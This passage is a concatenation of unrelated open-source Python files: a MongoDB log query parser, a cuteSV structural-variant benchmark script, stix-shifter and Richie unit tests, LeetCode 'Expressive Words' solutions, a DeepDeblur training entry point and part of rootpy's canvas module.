year = datetime.utcnow().year
timestamp = mktime(strptime(match.group('ts') + ' ' + str(year), '%a %b %d %H:%M:%S %Y'))
ts = datetime.fromtimestamp(timestamp)
return ts
################################################################################
# Parser
# Provides a parse function that passes input to a round of handlers.
################################################################################
class Parser(object):
def __init__(self, handlers):
self._line_handlers = handlers
def parse(self, input):
"""Passes input to each QueryLineHandler in use"""
query = None
for handler in self._line_handlers:
try:
query = handler.handle(input)
except Exception as e:
query = None
finally:
if query is not None:
return query
return None
################################################################################
# ProfileParser
# Extracts queries from profile entries using a single ProfileEntryHandler
################################################################################
class ProfileParser(Parser):
def __init__(self):
"""Declares the QueryLineHandlers to use"""
super(ProfileParser, self).__init__([self.ProfileEntryHandler()])
def get_line_time(self, input):
return input['ts'] if 'ts' in input else None
############################################################################
# Base ProfileEntryHandler class
# Knows how to yamlfy a logline query
############################################################################
class ProfileEntryHandler:
########################################################################
def handle(self, input):
result = OrderedDict()
query = None
orderby = None
if (input is not None) and (input.has_key('op')):
if input['op'] == 'query':
if input['query'].has_key('$query'):
query = input['query']['$query']
if input['query'].has_key('$orderby'):
orderby = input['query']['$orderby']
else:
query = input['query']
result['ns'] = input['ns']
elif input['op'] == 'update':
query = input['query']
if input.has_key('updateobj'):
if input['updateobj'].has_key('orderby'):
orderby = input['updateobj']['orderby']
result['ns'] = input['ns']
elif ((input['op'] == 'command') and
((input['command'].has_key('count')) or
(input['command'].has_key('findAndModify')))):
query = input['command']['query']
db = input['ns'][0:input['ns'].rfind('.')]
result['ns'] = db + "." + input['command']['count']
else:
return None
toMask = OrderedDict()
if orderby is not None:
result['orderby'] = orderby
toMask['$orderby'] = orderby
result['query'] = scrub(query)
toMask['$query'] = query
result['queryMask'] = small_json(toMask)
result['stats'] = {'millis': input['millis']}
return result
else:
return None
################################################################################
# LogParser
# Extracts queries from log lines using a list of QueryLineHandlers
################################################################################
class LogParser(Parser):
def __init__(self):
"""Declares the QueryLineHandlers to use"""
super(LogParser, self).__init__([CmdQueryHandler(),
UpdateQueryHandler(),
StandardQueryHandler(),
TimeLineHandler()])
############################################################################
# Base QueryLineHandler class
# Knows how to yamlfy a logline query
############################################################################
class QueryLineHandler:
########################################################################
def parse_query(self, extracted_query):
return yamlfy(extracted_query)
def handle(self, line):
result = self.do_handle(line)
if result is not None:
result['ts'] = get_line_time(line)
return result
def do_handle(self, line):
return None
def parse_line_stats(self, stat_string):
line_stats = {}
split = stat_string.split(" ")
for stat in split:
if stat is not "" and stat is not None and stat != "locks(micros)":
stat_split = stat.split(":")
                if (stat_split is not None) and (stat_split != "") and (len(stat_split) == 2):
try:
line_stats[stat_split[0]] = int(stat_split[1])
except:
pass
return line_stats
def standardize_query(self, query_yaml):
if len(query_yaml.keys()) == 1:
if '$query' in query_yaml:
return scrub(query_yaml)
if 'query' in query_yaml:
return OrderedDict([('$query', scrub(query_yaml['query']))])
if len(query_yaml.keys()) == 2:
query = None
orderby = None
if 'query' in query_yaml:
query = query_yaml['query']
elif '$query' in query_yaml:
query = query_yaml['$query']
if 'orderby' in query_yaml:
orderby = query_yaml['orderby']
elif '$orderby' in query_yaml:
orderby = query_yaml['$orderby']
if query is not None and orderby is not None:
return OrderedDict([('$query', scrub(query)),
('$orderby', orderby)])
return OrderedDict([('$query', scrub(query_yaml))])
############################################################################
# StandardQueryHandler
# QueryLineHandler implementation for general queries (incl. getmore)
############################################################################
class StandardQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Standard Query Log Line Handler'
self._regex = '.*\[(?P<connection>\S*)\] '
self._regex += '(?P<operation>\S+) (?P<ns>\S+\.\S+) query: '
self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)'
self._regex += '(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
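    # Illustrative log line in the general shape this regex expects (values are
    # made up): "Mon Jan  1 00:00:00 [conn1] query test.foo query: { a: 1 } nscanned:10 nreturned:1 120ms"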
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
scrubbed = self.standardize_query(parsed)
result['query'] = scrubbed['$query']
if '$orderby' in scrubbed:
result['orderby'] = scrubbed['$orderby']
result['queryMask'] = small_json(scrubbed)
result['ns'] = match.group('ns')
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
result['supported'] = True
return result
return None
############################################################################
# CmdQueryHandler
# QueryLineHandler implementation for $cmd queries (count, findandmodify)
############################################################################
class CmdQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'CMD Log Line Handler'
self._regex = '.*\[conn(?P<connection_id>\d+)\] '
self._regex += 'command (?P<db>\S+)\.\$cmd command: '
self._regex += '(?P<query>\{.*\}) (?P<stats>(\S+ )*)'
self._regex += '(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
command = parsed.keys()[0]
toMask = OrderedDict()
result['command'] = command
result['supported'] = True
if command.lower() == 'count':
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['query'])
result['query'] = query['$query']
toMask = query
elif command.lower() == 'findandmodify':
if 'sort' in parsed:
result['orderby'] = parsed['sort']
toMask['$orderby'] = parsed['sort']
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['query'])
result['query'] = query['$query']
if 'sort' in parsed:
result['orderby'] = parsed['sort']
toMask['$orderby'] = parsed['sort']
toMask['$query'] = query
elif command.lower() == 'geonear':
result['ns'] = match.group('db') + '.'
result['ns'] += parsed[command]
query = self.standardize_query(parsed['search'])
result['query'] = query
toMask = query
else:
result['supported'] = False
result['ns'] = match.group('db') + '.$cmd'
result['command'] = command
toMask['$cmd'] = command
result['queryMask'] = small_json(toMask)
return result
return None
############################################################################
# UpdateQueryHandler
# QueryLineHandler implementation for update queries
############################################################################
class UpdateQueryHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Update Log Line Handler'
self._regex = '.*\[conn(?P<connection_id>\d+)\] '
self._regex += 'update (?P<ns>\S+\.\S+) query: '
self._regex += '(?P<query>\{.*\}) update: (?P<update>\{.*\}) '
self._regex += '(?P<stats>(\S+ )*)(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
parsed = self.parse_query(match.group('query'))
if parsed is not None:
result = OrderedDict()
scrubbed = self.standardize_query(parsed)
result['query'] = scrubbed['$query']
if '$orderby' in scrubbed:
result['orderby'] = scrubbed['$orderby']
result['queryMask'] = small_json(scrubbed)
result['ns'] = match.group('ns')
result['stats'] = self.parse_line_stats(match.group('stats'))
result['stats']['millis'] = match.group('query_time')
result['supported'] = True
return result
return None
############################################################################
# Empty TimeLineHandler class
# Last Resort for unparsed lines
############################################################################
class TimeLineHandler(QueryLineHandler):
########################################################################
def __init__(self):
self.name = 'Standard Query Log Line Handler'
self._regex = '.*(?P<query_time>\d+)ms'
self._rx = re.compile(self._regex)
########################################################################
def do_handle(self, input):
match = self._rx.match(input)
if match is not None:
return {'ns': "?",
'stats': {"millis": match.group('query_time')},
'supported': False,
'queryMask': None
}
return None
|
src/benchmarks/cmp_NA19240.py | npinter/cuteSV | 116 | 11096887 | <filename>src/benchmarks/cmp_NA19240.py
import sys
import argparse
import logging
import time
callset = {1: "cuteSV", 2: "Sniflles", 3: "PBSV", 4: "SVIM"}
USAGE="""\
Evaluate SV callset on NA19240 dataset
"""
def parseArgs(argv):
parser = argparse.ArgumentParser(prog="NA19240_eval", description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("base", type=str, help="Base vcf file of NA19240.")
parser.add_argument("cuteSV", type=str, help="CuteSV vcf file of NA19240.")
parser.add_argument("sniffles", type=str, help="Sniffles vcf file of NA19240.")
parser.add_argument("pbsv", type=str, help="PBSV vcf file of NA19240.")
parser.add_argument("svim", type=str, help="SVIM vcf file of NA19240.")
    parser.add_argument('-b', '--bias', help = "Bias of overlapping.[%(default)s]", default = 0.7, type = float)
    parser.add_argument('-o', '--offect', help = "Offset of breakpoint distance.[%(default)s]", default = 1000, type = int)
args = parser.parse_args(argv)
return args
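# Example invocation (sketch; the VCF file names are placeholders):
#   python cmp_NA19240.py base.vcf cuteSV.vcf sniffles.vcf pbsv.vcf svim.vcf -b 0.7 -o 1000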
def pase_base_info(seq):
info = {'SVLEN': 0, 'END': 0, "SVTYPE": '', "RE": 0}
for i in seq.split(';'):
if i.split('=')[0] in ["SVLEN", "END", "RE"]:
try:
info[i.split('=')[0]] = abs(int(i.split('=')[1]))
except:
pass
if i.split('=')[0] == "SVTYPE":
info[i.split('=')[0]] = i.split('=')[1][0:3]
return info
def load_base(base_path):
base_call = dict()
file = open(base_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[4][1:4]
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
if ALT == "DUP":
ALT = "INS"
info = pase_base_info(seq[7])
if ALT not in base_call:
base_call[ALT] = dict()
if chr not in base_call[ALT]:
base_call[ALT][chr] = list()
if ALT == "INV":
base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return base_call
def load_cuteSV(cuteSV_path):
# inv_tag = 0
last_inv = list()
cuteSV_call = dict()
file = open(cuteSV_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[2][7:10]
# if ALT == "DUP":
# ALT = "INS"
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
info = pase_base_info(seq[7])
if ALT not in cuteSV_call:
cuteSV_call[ALT] = dict()
if chr not in cuteSV_call[ALT]:
cuteSV_call[ALT][chr] = list()
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
if ALT == "INV":
last_inv.append([ALT, chr, pos, info["SVLEN"], info["END"], info["RE"]])
# if inv_tag == 0
else:
cuteSV_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
# inv_tag = 0
if len(last_inv):
last_inv = sorted(last_inv, key = lambda x:-x[3])
cuteSV_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0])
last_inv = list()
file.close()
return cuteSV_call
def load_sniffles(sniffles_path):
sniffles_call = dict()
last_inv = list()
file = open(sniffles_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
info = pase_base_info(seq[7])
if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]:
continue
# if info["SVTYPE"] == "DUP":
# info["SVTYPE"] = "INS"
if info["SVTYPE"] not in sniffles_call:
sniffles_call[info["SVTYPE"]] = dict()
if chr not in sniffles_call[info["SVTYPE"]]:
sniffles_call[info["SVTYPE"]][chr] = list()
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
if info["SVTYPE"] == "INV":
last_inv.append([info["SVTYPE"], chr, pos, info["SVLEN"], info["END"], info["RE"]])
else:
sniffles_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0])
if len(last_inv):
last_inv = sorted(last_inv, key = lambda x:-x[3])
sniffles_call[last_inv[0][0]][last_inv[0][1]].append([last_inv[0][2], last_inv[0][3], last_inv[0][4], 0])
last_inv = list()
file.close()
return sniffles_call
def load_pbsv(pbsv_path):
pbsv_call = dict()
file = open(pbsv_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
info = pase_base_info(seq[7])
if info["SVTYPE"] not in ["INS", "INV", "DEL", "DUP"]:
continue
# if info["SVTYPE"] == "DUP":
# info["SVTYPE"] = "INS"
if info["SVTYPE"] not in pbsv_call:
pbsv_call[info["SVTYPE"]] = dict()
if chr not in pbsv_call[info["SVTYPE"]]:
pbsv_call[info["SVTYPE"]][chr] = list()
if info["SVTYPE"] == "INV":
pbsv_call[info["SVTYPE"]][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
pbsv_call[info["SVTYPE"]][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return pbsv_call
def load_svim(base_path):
base_call = dict()
file = open(base_path, 'r')
for line in file:
seq = line.strip('\n').split("\t")
if seq[0][0] == '#':
continue
chr = seq[0]
pos = int(seq[1])
ALT = seq[4][1:4]
if ALT not in ["INS", "INV", "DEL", "DUP"]:
continue
# if ALT == "DUP":
# ALT = "INS"
info = pase_base_info(seq[7])
if ALT not in base_call:
base_call[ALT] = dict()
if chr not in base_call[ALT]:
base_call[ALT][chr] = list()
if ALT == "INV":
base_call[ALT][chr].append([pos, info["END"] - pos + 1, info["END"], 0])
else:
if info["SVLEN"] >= 50 and info["SVLEN"] <= 100000:
base_call[ALT][chr].append([pos, info["SVLEN"], info["END"], 0])
file.close()
return base_call
def cmp_callsets(base, call, flag, Bias, Offect):
for svtype in base:
if svtype not in call:
continue
else:
for chr in base[svtype]:
if chr not in call[svtype]:
continue
else:
for i in base[svtype][chr]:
for j in call[svtype][chr]:
if i[0] - Offect <= j[0] <= i[2] + Offect or i[0] - Offect <= j[2] <= i[2] + Offect or j[0] - Offect <= i[0] <= j[2] + Offect:
if min(i[1], j[1])*1.0/max(i[1], j[1]) >= Bias:
i[3] = flag
j[3] = flag
else:
pass
total_base = 0
tp_base = 0
# for svtype in ["INS"]:
# for svtype in ["DUP"]:
# for svtype in ["DEL"]:
# for svtype in ["INS", "DEL"]:
for svtype in ["INS", "DEL", "INV"]:
# for svtype in ["INS", "DEL", "INV", "DUP"]:
# for svtype in ["INV"]:
for chr in base[svtype]:
for i in base[svtype][chr]:
total_base += 1
if i[3] == flag:
tp_base += 1
# else:
# print(flag, svtype, chr, i[0], i[1], i[2])
# logging.info("Base count: %d"%(total_base))
# logging.info("TP-base count: %d"%(tp_base))
logging.info("====%s===="%(callset[flag]))
total_call = 0
tp_call = 0
# for svtype in ["INS"]:
# for svtype in ["DUP"]:
# for svtype in ["DEL"]:
# for svtype in ["INS", "DEL"]:
for svtype in ["INS", "DEL", "INV"]:
# for svtype in ["INS", "DEL", "INV", "DUP"]:
# for svtype in ["INV"]:
for chr in call[svtype]:
for i in call[svtype][chr]:
total_call += 1
if i[3] == flag:
tp_call += 1
logging.info("Camp count: %d"%(total_call))
logging.info("TP-call count: %d"%(tp_call))
logging.info("Precision: %.2f"%(100.0*tp_call/total_call))
logging.info("Recall: %.2f"%(100.0*tp_base/total_base))
logging.info("F-measure: %.2f"%(200.0*tp_base*tp_call/(total_base*tp_call+tp_base*total_call)))
def main_ctrl(args):
# pass
base_call = load_base(args.base)
cuteSV_call = load_cuteSV(args.cuteSV)
sniffles_call = load_sniffles(args.sniffles)
pbsv_call = load_pbsv(args.pbsv)
svim_call = load_svim(args.svim)
# for svtype in sniffles_call:
# for chr in sniffles_call[svtype]:
# for i in sniffles_call[svtype][chr]:
# print(svtype, chr, i)
cmp_callsets(base_call, cuteSV_call, 1, args.bias, args.offect)
cmp_callsets(base_call, sniffles_call, 2, args.bias, args.offect)
cmp_callsets(base_call, pbsv_call, 3, args.bias, args.offect)
cmp_callsets(base_call, svim_call, 4, args.bias, args.offect)
def main(argv):
args = parseArgs(argv)
setupLogging(False)
# print args
starttime = time.time()
main_ctrl(args)
logging.info("Finished in %0.2f seconds."%(time.time() - starttime))
def setupLogging(debug=False):
logLevel = logging.DEBUG if debug else logging.INFO
logFormat = "%(asctime)s [%(levelname)s] %(message)s"
logging.basicConfig( stream=sys.stderr, level=logLevel, format=logFormat )
logging.info("Running %s" % " ".join(sys.argv))
if __name__ == '__main__':
main(sys.argv[1:])
|
mindinsight/lineagemgr/common/utils.py | fapbatista/mindinsight | 216 | 11096895 | <filename>mindinsight/lineagemgr/common/utils.py
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Lineage utils."""
import re
from mindinsight.datavisual.data_transform.summary_watcher import SummaryWatcher
def enum_to_list(enum):
"""Enum to list."""
return [enum_ele.value for enum_ele in enum]
def get_timestamp(filename):
"""Get timestamp from filename."""
timestamp = int(re.search(SummaryWatcher().SUMMARY_FILENAME_REGEX, filename)[1])
return timestamp
|
stix_shifter_modules/msatp/tests/stix_translation/test_query_constructor_func.py | pyromaneact/stix-shifter | 129 | 11096953 | from stix_shifter_modules.msatp.stix_translation import query_constructor
from stix_shifter_modules.msatp.stix_translation.query_constructor import QueryStringPatternTranslator
import unittest
class MergeDictTests(unittest.TestCase):
def test_with_overlapping_keys(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
dict_02 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
expected_res = {1: ['a', 'a'], 2: ['b', 'b'], 3: ['c', 'c'], 4: ['d', 'd']}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result")
def test_without_overlapping_keys(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c', 4: 'd'}
dict_02 = {5: 'e', 6: 'f', 7: 'g', 8: 'h'}
expected_res = {1: 'a', 2: 'b', 3: 'c', 4: 'd', 5: 'e', 6: 'f', 7: 'g', 8: 'h'}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), expected_res, "incorrect result")
def test_with_empty_map(self):
dict_01 = {1: 'a', 2: 'b'}
dict_02 = {}
self.assertDictEqual(QueryStringPatternTranslator.mergeDict(dict_01, dict_02), dict_01, "incorrect result")
class ConstructIntersecMap(unittest.TestCase):
def test_non_empty_intersection(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c'}
dict_02 = {1: 'a', 2: 'b', 4: 'd'}
expected_res = {1: ['a', 'a'], 2: ['b', 'b']}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), expected_res,
"incorrect result")
def test_empty_intersection(self):
dict_01 = {1: 'a', 2: 'b', 3: 'c'}
dict_02 = {4: 'd', 5: 'e', 6: 'f'}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), {},
"incorrect result")
def test_with_empty_map(self):
dict_01 = {1: 'a', 2: 'b'}
dict_02 = {}
self.assertDictEqual(QueryStringPatternTranslator.construct_intesec_map(dict_01, dict_02), dict_02, "incorrect result")
def test_construct_and_op_map(self):
test_mep_01 = {"DeviceNetworkEvents": 'DeviceName =~ "2.client-channel.google.com"',
"DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
expected_res = {"DeviceNetworkEvents": '(InitiatingProcessFileName =~ "demo-gthread-3.6.dll") and (DeviceName '
'=~ "2.client-channel.google.com")'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), expected_res, "incorrect result")
def test_construct_and_op_map_with_empty_map(self):
test_mep_01 = {}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result")
def test_construct_and_op_map_with_empty_intersec(self):
test_mep_01 = {"DeviceProcessEvents": 'InitiatingProcessFileName =~ "WmiPrvSE.exe"'}
test_map_02 = {"DeviceNetworkEvents": 'InitiatingProcessFileName =~ "demo-gthread-3.6.dll"'}
self.assertDictEqual(QueryStringPatternTranslator.construct_and_op_map(test_mep_01, test_map_02), {}, "incorrect result")
|
tests/apps/core/test_templates_richie_homepage.py | regisb/richie | 174 | 11096960 | """
Test suite for the Open Graph of the homepage
"""
import re
from django.test.utils import override_settings
from cms.test_utils.testcases import CMSTestCase
from richie.apps.core.helpers import create_i18n_page
class TemplatesRichieHomepageTestCase(CMSTestCase):
"""Testing the base.html template"""
def test_templates_richie_homepage_meta_og_image(self):
"""
Test if the homepage has the default og:image logo
"""
homepage = create_i18n_page("my title", is_homepage=True)
homepage.publish("en")
url = homepage.get_absolute_url(language="en")
response = self.client.get(url)
response_content = response.content.decode("UTF-8")
match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content)
html_meta_og_image = match.group(0)
self.assertIn(
'content="http://testserver/static/richie/images/logo.png',
html_meta_og_image,
)
self.assertIn("richie/images/logo.png", html_meta_og_image)
@override_settings(STATIC_URL="https://xyz.cloudfront.net/static/")
def test_templates_richie_homepage_meta_og_image_with_cdn(self):
"""
Test if the homepage has the default og:image logo when using a CDN
"""
homepage = create_i18n_page("my title", is_homepage=True)
homepage.publish("en")
url = homepage.get_absolute_url(language="en")
response = self.client.get(url)
response_content = response.content.decode("UTF-8")
match = re.search("<meta[^>]+og:image[^>]+(/)?>", response_content)
html_meta_og_image = match.group(0)
self.assertIn(
'content="https://xyz.cloudfront.net/static/richie/images/logo.png',
html_meta_og_image,
)
self.assertIn("richie/images/logo.png", html_meta_og_image)
|
String/809. Expressive Words.py | beckswu/Leetcode | 138 | 11096984 | <filename>String/809. Expressive Words.py
"""
809. Expressive Words
Example:
Input:
S = "heeellooo"
words = ["hello", "hi", "helo"]
Output: 1
Explanation:
We can extend "e" and "o" in the word "hello" to get "heeellooo".
We can't extend "helo" to get "heeellooo" because the group "ll" is not extended.
"""
class Solution:
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
res = 0
for word in words:
i = j = 0
while i<len(S):
if j<len(word) and S[i] == word[j]:
i+=1
j+=1
elif i+1<len(S) and S[i+1] == S[i] and i>0 and S[i] == S[i-1]:
i+=1
elif not (i>1 and S[i] == S[i-1] == S[i-2]):
break
else:
i+=1
if i == len(S) and j == len(word):
res += 1
return res
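# Quick sanity check (illustrative): with S = "heeellooo" and
# words = ["hello", "hi", "helo"], Solution().expressiveWords(S, words) == 1,
# matching the example in the docstring above.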
class Solution:
def expressiveWords(self, S, words):
def is_stretched(S, W):
i, j, n, m = 0, 0, len(S), len(W)
for i in range(n):
if j < m and S[i] == W[j]:
j += 1
elif S[i-1:i+2] != S[i]*3 != S[i-2:i+1]:
return False
return j == m
return sum(is_stretched(S, w) for w in words)
import itertools
class Solution(object):
def expressiveWords(self, S, words):
"""
:type S: str
:type words: List[str]
:rtype: int
"""
# Run length encoding
def RLE(S):
return zip(*[(k, len(list(grp)))
for k, grp in itertools.groupby(S)])
R, count = RLE(S)
result = 0
for word in words:
R2, count2 = RLE(word)
if R2 != R:
continue
result += all(c1 >= max(c2, 3) or c1 == c2
for c1, c2 in zip(count, count2))
return result |
src/main.py | alpayuz/DeepDeblur-PyTorch | 158 | 11097015 | <reponame>alpayuz/DeepDeblur-PyTorch
"""main file that does everything"""
from utils import interact
from option import args, setup, cleanup
from data import Data
from model import Model
from loss import Loss
from optim import Optimizer
from train import Trainer
def main_worker(rank, args):
args.rank = rank
args = setup(args)
loaders = Data(args).get_loader()
model = Model(args)
model.parallelize()
optimizer = Optimizer(args, model)
criterion = Loss(args, model=model, optimizer=optimizer)
trainer = Trainer(args, model, criterion, optimizer, loaders)
if args.stay:
interact(local=locals())
exit()
if args.demo:
trainer.evaluate(epoch=args.start_epoch, mode='demo')
exit()
for epoch in range(1, args.start_epoch):
if args.do_validate:
if epoch % args.validate_every == 0:
trainer.fill_evaluation(epoch, 'val')
if args.do_test:
if epoch % args.test_every == 0:
trainer.fill_evaluation(epoch, 'test')
for epoch in range(args.start_epoch, args.end_epoch+1):
if args.do_train:
trainer.train(epoch)
if args.do_validate:
if epoch % args.validate_every == 0:
if trainer.epoch != epoch:
trainer.load(epoch)
trainer.validate(epoch)
if args.do_test:
if epoch % args.test_every == 0:
if trainer.epoch != epoch:
trainer.load(epoch)
trainer.test(epoch)
if args.rank == 0 or not args.launched:
print('')
trainer.imsaver.join_background()
cleanup(args)
def main():
main_worker(args.rank, args)
if __name__ == "__main__":
main() |
python/ql/test/3/library-tests/modules/general/confused_elements/__init__.py | vadi2/codeql | 4,036 | 11097027 | from .a import b as a |
rootpy/plotting/canvas.py | masonproffitt/rootpy | 146 | 11097036 | """
This module implements python classes which inherit from
and extend the functionality of the ROOT canvas classes.
"""
from __future__ import absolute_import
from .. import ROOT, QROOT, asrootpy
from .base import convert_color
from ..base import NamedObject
from ..context import invisible_canvas
from ..decorators import snake_case_methods
from ..memory.keepalive import keepalive
from array import array
__all__ = [
'Pad',
'Canvas',
]
class _PadBase(NamedObject):
# https://sft.its.cern.ch/jira/browse/ROOT-9007
# can remove this after 6.10/04
EmitVA = None
def cd(self, *args):
pad = asrootpy(super(_PadBase, self).cd(*args))
if pad and pad is not self:
keepalive(self, pad)
return pad
def axes(self, ndim=1,
xlimits=None, ylimits=None, zlimits=None,
xbins=1, ybins=1, zbins=1):
"""
Create and return axes on this pad
"""
if xlimits is None:
xlimits = (0, 1)
if ylimits is None:
ylimits = (0, 1)
if zlimits is None:
zlimits = (0, 1)
if ndim == 1:
from .hist import Hist
hist = Hist(1, xlimits[0], xlimits[1])
elif ndim == 2:
from .hist import Hist2D
hist = Hist2D(1, xlimits[0], xlimits[1],
1, ylimits[0], ylimits[1])
elif ndim == 3:
from .hist import Hist3D
hist = Hist3D(1, xlimits[0], xlimits[1],
1, ylimits[0], ylimits[1],
1, zlimits[0], zlimits[1])
else:
raise ValueError("ndim must be 1, 2, or 3")
with self:
hist.Draw('AXIS')
xaxis = hist.xaxis
yaxis = hist.yaxis
if isinstance(xbins, (list, tuple)):
xbins = array('d', xbins)
if hasattr(xbins, '__iter__'):
xaxis.Set(len(xbins) - 1, xbins)
else:
xaxis.Set(xbins, *xlimits)
if ndim > 1:
if isinstance(ybins, (list, tuple)):
ybins = array('d', ybins)
if hasattr(ybins, '__iter__'):
yaxis.Set(len(ybins) - 1, ybins)
else:
yaxis.Set(ybins, *ylimits)
else:
yaxis.limits = ylimits
yaxis.range_user = ylimits
if ndim > 1:
zaxis = hist.zaxis
if ndim == 3:
if isinstance(zbins, (list, tuple)):
zbins = array('d', zbins)
if hasattr(zbins, '__iter__'):
zaxis.Set(len(zbins) - 1, zbins)
else:
zaxis.Set(zbins, *zlimits)
else:
zaxis.limits = zlimits
zaxis.range_user = zlimits
return xaxis, yaxis, zaxis
return xaxis, yaxis
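    # Illustrative usage (sketch; assumes a working ROOT/rootpy installation):
    #   c = Canvas(width=800, height=600)
    #   with c:
    #       xaxis, yaxis = c.axes(xlimits=(0, 10), ylimits=(0, 1))
    #   c.margin = (0.15, 0.05, 0.12, 0.05)  # left, right, bottom, top fractions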
@property
def primitives(self):
return asrootpy(self.GetListOfPrimitives())
def find_all_primitives(self):
"""
        Recursively find all primitives on a pad, even those hiding behind a
GetListOfFunctions() of a primitive
"""
# delayed import to avoid circular import
from .utils import find_all_primitives
return find_all_primitives(self)
@property
def canvas(self):
return asrootpy(self.GetCanvas())
@property
def mother(self):
return asrootpy(self.GetMother())
@property
def margin(self):
return (self.GetLeftMargin(), self.GetRightMargin(),
self.GetBottomMargin(), self.GetTopMargin())
@margin.setter
def margin(self, bounds):
left, right, bottom, top = bounds
super(_PadBase, self).SetMargin(left, right, bottom, top)
@property
def margin_pixels(self):
left, right, bottom, top = self.margin
width = self.width_pixels
height = self.height_pixels
return (int(left * width), int(right * width),
int(bottom * height), int(top * height))
@margin_pixels.setter
def margin_pixels(self, bounds):
left, right, bottom, top = bounds
width = float(self.width_pixels)
height = float(self.height_pixels)
super(_PadBase, self).SetMargin(left / width, right / width,
bottom / height, top / height)
@property
def range(self):
x1, y1 = ROOT.Double(), ROOT.Double()
x2, y2 = ROOT.Double(), ROOT.Double()
super(_PadBase, self).GetRange(x1, y1, x2, y2)
return x1, y1, x2, y2
@range.setter
def range(self, bounds):
x1, y1, x2, y2 = bounds
super(_PadBase, self).Range(x1, y1, x2, y2)
@property
def range_axis(self):
x1, y1 = ROOT.Double(), ROOT.Double()
x2, y2 = ROOT.Double(), ROOT.Double()
super(_PadBase, self).GetRangeAxis(x1, y1, x2, y2)
return x1, y1, x2, y2
@range_axis.setter
def range_axis(self, bounds):
x1, y1, x2, y2 = bounds
super(_PadBase, self).RangeAxis(x1, y1, x2, y2)
def __enter__(self):
self._prev_pad = ROOT.gPad
self.cd()
return self
def __exit__(self, type, value, traceback):
# similar to preserve_current_canvas in rootpy/context.py
if self._prev_pad:
self._prev_pad.cd()
elif ROOT.gPad:
# Put things back how they were before.
with invisible_canvas():
# This is a round-about way of resetting gPad to None.
# No other technique I tried could do it.
pass
self._prev_pad = None
return False
@snake_case_methods
class Pad(_PadBase, QROOT.TPad):
_ROOT = QROOT.TPad
def __init__(self, xlow, ylow, xup, yup,
color=-1,
bordersize=-1,
bordermode=-2,
name=None,
title=None):
color = convert_color(color, 'root')
super(Pad, self).__init__(xlow, ylow, xup, yup,
color, bordersize, bordermode,
name=name,
title=title)
def Draw(self, *args):
